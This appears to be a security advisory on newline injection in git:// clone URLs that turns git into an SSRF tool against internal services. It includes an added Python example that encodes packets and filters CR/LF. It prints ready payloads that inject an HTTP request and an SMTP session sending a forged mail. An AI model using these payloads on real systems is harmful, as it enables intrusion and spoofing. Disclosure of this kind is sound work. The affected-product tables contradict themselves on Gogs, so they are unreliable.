
Description

When we connect to a server over the git:// protocol, the client sends an initial request packet that looks something like:

002dgit-upload-pack repo.git\0host=example.com

When the repository path contains a newline, the git clone command copies the newline characters (CR, LF) into the packet unchanged:

002egit-upload-pack repo
.git\0host=example.com

It looks harmless at first sight, but the main problem is that a crafted path can inject arbitrary lines into the packet, and the packet can be sent to any port, where another protocol will interpret those lines. This opens the possibility of an SSRF attack against internal services.

For example, running a command like the following

$ git clone 'git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a'

will eventually send the following packet to localhost:1234:

0050git-upload-pack /
GET / HTTP/1.1
Host:localhost

host=localhost:1234
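The following is an added example, not code from the original post or from git itself. It builds the git-upload-pack request in the layout the post shows (the trailing NUL that real git appends is omitted so the lengths match the post's packets exactly, which is an assumption of this example), decodes such a packet the way a server would, and applies the check that removes the bug: refusing any repository path or host that contains CR or LF before it reaches the wire. The names `safe_upload_pack_request` and `server_accepts` are illustrative and not part of any real project.

```python
"""
Added example: git pkt-line construction, decoding, and the CR/LF check
that prevents the newline injection described in the post.
"""
import re

CRLF_RE = re.compile(r"[\r\n]")
COMMAND = b"git-upload-pack "


def pkt_line(payload: bytes) -> bytes:
    """Encode one git pkt-line: four hex digits giving the total length
    (the 4-byte header included), followed by the payload."""
    total = len(payload) + 4
    if total > 0xFFFF:
        raise ValueError("pkt-line payload too long")
    return f"{total:04x}".encode("ascii") + payload


def upload_pack_request(path: str, host: str) -> bytes:
    """Build the initial request exactly as the post renders it:
    'git-upload-pack <path>\\0host=<host>'. Nothing is filtered here,
    so a path containing CR/LF is copied into the packet unchanged."""
    payload = COMMAND + path.encode() + b"\x00host=" + host.encode()
    return pkt_line(payload)


def parse_pkt_line(data: bytes) -> tuple[str, str]:
    """Decode one request pkt-line and return (path, host).
    Raises ValueError on a malformed header or unexpected command."""
    if len(data) < 4:
        raise ValueError("short pkt-line")
    total = int(data[:4], 16)
    if total != len(data):
        raise ValueError("pkt-line length mismatch")
    body = data[4:]
    if not body.startswith(COMMAND):
        raise ValueError("unexpected command")
    path, _, host_part = body[len(COMMAND):].partition(b"\x00")
    host = host_part[5:] if host_part.startswith(b"host=") else host_part
    return path.decode(), host.decode()


def has_crlf(value: str) -> bool:
    """True if the value carries a carriage return or line feed."""
    return CRLF_RE.search(value) is not None


def safe_upload_pack_request(path: str, host: str) -> bytes:
    """Client-side fix (illustrative): refuse to build a request whose
    path or host could inject extra lines into the packet."""
    if has_crlf(path) or has_crlf(host):
        raise ValueError("CR/LF not allowed in repository path or host")
    return upload_pack_request(path, host)


def server_accepts(data: bytes) -> bool:
    """Server-side filter (illustrative): decode the packet and reject it
    if the path or host contains CR/LF, i.e. the 'CRLF characters were
    filtered' behaviour."""
    try:
        path, host = parse_pkt_line(data)
    except ValueError:
        return False
    return not (has_crlf(path) or has_crlf(host))


if __name__ == "__main__":
    # Sample inputs constructed from the post's own three packets.
    for path, host in [("repo.git", "example.com"),
                       ("repo\n.git", "example.com"),
                       ("/\r\n\r\nGET / HTTP/1.1 \r\nHost:localhost\r\n\r\n",
                        "localhost:1234")]:
        pkt = upload_pack_request(path, host)
        print(pkt[:4].decode(), "server accepts:", server_accepts(pkt))
```

Run stand-alone, the script prints the same length prefixes the post shows (002d, 002e, 0050) and shows the server-side check accepting only the first packet.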

More elaborate payloads can be built the same way. For instance, the following command sends SMTP commands inside the packet and delivers an e-mail over the SMTP protocol:

$ git clone 'git://localhost:25/x%0d%0aHELO%20localhost%0d%0aMAIL%20FROM%3A%[email protected]%3E%0d%0aRCPT%20TO%3A%[email protected]%3E%0d%0aDATA%0d%0aFrom%3A%20%5BHacker%5D%20%[email protected]%3E%0d%0aTo%3A%20%[email protected]%0d%0aDate%3ATue,%2015%20Sep%202017%0aSubject%3A%20Hi%0d%0a.%0d%0aQUIT%0a'

Patch Status

  • git/git has been fixed appropriately.

  • Software that relies on git clone may be affected by this vulnerability.

Affected Products

Product Name | Current Status | Reference
git          | Fixed          | @a02ea577
Kallithea    | Fixed          | Release Notes v0.63
Gogs         | Fixed          | Plans to fix in upcoming release (v0.13)
Gitea        | Fixed          | Release v1.12.6
BitBucket    | Mitigated      | Bounty awarded: P3

Unaffected Products

Product Name | Reason
GitHub       | Git protocol is not supported
Gitee        | Port part is filtered, which leads to no impact
Gogs         | CRLF characters were filtered